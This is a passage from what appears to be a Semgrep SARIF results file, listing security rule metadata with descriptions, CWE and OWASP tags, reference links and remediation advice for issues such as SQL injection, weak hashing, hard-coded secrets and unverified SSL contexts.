[https://docs.python.org/3/library/ssl.html#ssl-security](https://docs.python.org/3/library/ssl.html#ssl-security)\n - [https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection](https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context","id":"python.lang.security.unverified-ssl-context.unverified-ssl-context","name":"python.lang.security.unverified-ssl-context.unverified-ssl-context","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.unverified-ssl-context.unverified-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"help":{"markdown":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length)\n - [https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/](https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options](https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures/](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n","text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","id":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","name":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","properties":{"precision":"very-high","tags":["CWE-310: CWE CATEGORY: Cryptographic Issues","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint","id":"rust.actix.sql.postgres-taint.postgres-taint","name":"rust.actix.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","id":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","name":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","id":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","name":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"help":{"markdown":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy)\n - [https://chainsecurity.com/heartbreaks-curve-lp-oracles/](https://chainsecurity.com/heartbreaks-curve-lp-oracles/)\n - [https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/](https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/)\n","text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","id":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","name":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"help":{"markdown":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection","id":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","name":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","properties":{"precision":"very-high","tags":["CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.unsafe-reflection.unsafe-reflection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"help":{"markdown":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsJs](https://docs.angularjs.org/api/ng/service/$sce#trustAsJs)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","id":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","name":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"help":{"markdown":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal)\n - [https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall](https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall)\n","text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"helpUri":"https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","id":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","name":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"help":{"markdown":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl](https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","id":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","name":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"help":{"markdown":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password)\n - [https://tools.ietf.org/html/rfc6151](https://tools.ietf.org/html/rfc6151)\n - [https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision](https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n - [https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords](https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords)\n - [https://github.com/returntocorp/semgrep-rules/issues/1609](https://github.com/returntocorp/semgrep-rules/issues/1609)\n - [https://docs.python.org/3/library/hashlib.html#hashlib.scrypt](https://docs.python.org/3/library/hashlib.html#hashlib.scrypt)\n","text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password","id":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","name":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.md5-used-as-password.md5-used-as-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"help":{"markdown":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)\n","text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","id":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","name":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"help":{"markdown":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string","id":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","name":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"help":{"markdown":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli)\n - [https://sequelize.org/master/manual/raw-queries.html](https://sequelize.org/master/manual/raw-queries.html)\n","text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","id":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","name":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request)\n - [https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-](https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-)\n - [https://www.baeldung.com/rest-template](https://www.baeldung.com/rest-template)\n","text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","id":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","name":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution)\n - [https://owasp.org/www-community/attacks/Code_Injection](https://owasp.org/www-community/attacks/Code_Injection)\n - [https://stackoverflow.com/questions/3115559/exploitable-php-functions](https://stackoverflow.com/questions/3115559/exploitable-php-functions)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution","id":"php.lang.security.tainted-code-execution.tainted-code-execution","name":"php.lang.security.tainted-code-execution.tainted-code-execution","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-code-execution.tainted-code-execution"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring)\n - [https://cwe.mitre.org/data/definitions/134.html](https://cwe.mitre.org/data/definitions/134.html)\n","text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","id":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","name":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","properties":{"precision":"very-high","tags":["CWE-134: Use of Externally-Controlled Format String","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. 